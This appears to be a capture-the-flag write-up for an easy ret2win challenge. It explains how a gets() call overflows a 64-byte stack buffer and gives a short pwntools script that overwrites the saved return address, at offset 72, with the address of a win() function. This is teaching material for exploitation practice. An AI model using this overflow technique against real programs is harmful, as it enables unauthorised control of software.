🚩 Challenge Overview
- Platform/Event: Google CTF 2025
- Difficulty: Easy
- Points: 120
- Solves: 654
- Category: Pwn
- Tags: Stack Overflow, Buffer Overflow, x84_64, ret2win
📝 Description
Basic x64 stack buffer overflow. Overwrite the saved return address (RIP) on the stack to jump to a hidden win() function that prints the flag.
💡 Solution / Approach
-
Analyze binary in GHIDRA: Locate target function
win()at address0x00401156. -
Find buffer size: The vulnerable
gets(buffer)fills a 64-byte array. The offset to the saved RIP is 72 bytes (64 bytes buffer + 8 bytes saved RBP). -
Build python exploit using pwntools:
from pwn import *
target = process('./ret2win')
win_addr = 0x00401156
payload = b"A" * 72 + p64(win_addr)
target.sendline(payload)
target.interactive()